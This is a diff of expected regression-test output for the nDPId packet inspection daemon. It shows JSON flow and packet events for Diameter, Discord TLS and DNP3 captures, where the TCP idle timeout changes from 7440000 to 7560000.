00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":1656,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1263278878357}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 6/6

16
test/results/discord.pcap.out
View File

@@ -1,12 +1,12 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"discord.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="}
00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="}
00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}}
00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}}
00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="}
00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="}
00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}}
00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}}
00542{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":3306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":42247}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 7/7

96
test/results/dnp3.pcap.out
View File

@@ -1,60 +1,60 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnp3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1097501938503}
00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
